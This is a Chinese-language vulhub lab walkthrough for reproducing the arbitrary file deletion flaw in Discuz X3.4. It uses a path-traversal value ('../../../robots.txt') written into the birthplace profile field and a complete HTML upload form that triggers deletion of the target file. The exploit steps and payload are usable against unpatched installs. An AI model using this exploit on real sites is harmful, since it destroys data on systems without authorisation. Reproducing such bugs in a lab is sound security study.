启动环境
# cd vulhub/discuz/x3.4-arbitrary-file-deletion
# docker-compose up -d
- 访问
ip
安装程序,安装时,只用修改数据库地址为db
,其他保持默认即可:
漏洞复现
- 首先注册一用户
zzqsmile
并登录
- 访问
http://your-ip/robots.txt
,可看到此时robots.txt文件是存在的。
- 抓包修改我们的个人资料—>出生地 为
../../../robots.txt
- 刷新页面即可看到修改成功,说明我们的脏数据已经进入数据库了。
- 然后,新建一个
upload.html
,代码如下,将其中的[your-ip]
改成discuz的域名,[form-hash]
改成你的formhash:
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<form action="http://[your-ip]/home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=[form-hash]" method="post" enctype="multipart/form-data">
<input type="file" name="birthprovince" />
<input type="submit" value="upload" />
</form>
</body>
</html>
- 用浏览器打开
upload.html
页面,上传一个正常图片。此时脏数据应该已被提取出,即robots.txt
文件被删除。
# docker-compose down